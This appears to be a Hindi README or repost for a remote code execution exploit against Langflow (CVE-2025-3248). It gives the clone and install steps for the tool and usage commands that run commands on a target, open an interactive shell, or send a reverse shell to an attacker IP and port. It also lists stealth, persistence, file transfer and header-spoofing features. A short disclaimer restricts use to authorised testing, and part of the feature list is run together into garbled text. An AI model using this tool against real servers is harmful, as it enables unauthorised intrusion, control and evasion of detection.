
Langflow के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248) - [ S4Tech द्वारा ]
लैंगफ्लो के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248)
persist कमांड)upload local_path remote_pathdownload remote_path local_pathclear कमांडUser-AgentX-Forwarded-For IP पतेexploit_log.txt में.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
⚠️ यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
⚠️ उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
पुल अनुरोधों का स्वागत है। बड़े बदलावों के लिए, कृपया पहले एक मुद्दा खोलें ताकि आप जो बदलना चाहते हैं उस पर चर्चा कर सकें।
| Feature | v1.0 | v2.0 |
|---|
| पेलोड विधियाँ | 1 | 5 |
| फ़ाइल स्थानांतरण | ❌ समर्थित नहीं | ✅ समर्थित |
| स्थिरता | ❌ | ✅ |
| छिपाव स्तर | बुनियादी | उन्नत |
| सत्र लॉगिंग | ❌ | ✅ |
| Option | Description |
|---|
--shell | इंटरैक्टिव शेल शुरू करें |
--reverse IP PORT | निर्दिष्ट IP:PORT पर रिवर्स शेल लॉन्च करें |
--command CMD | एकल कमांड निष्पादित करें |
--verbose | विस्तृत आउटपुट सक्षम करें |
--timeout SEC | अनुरोध टाइमआउट सेट करें (डिफ़ॉल्ट: 10s) |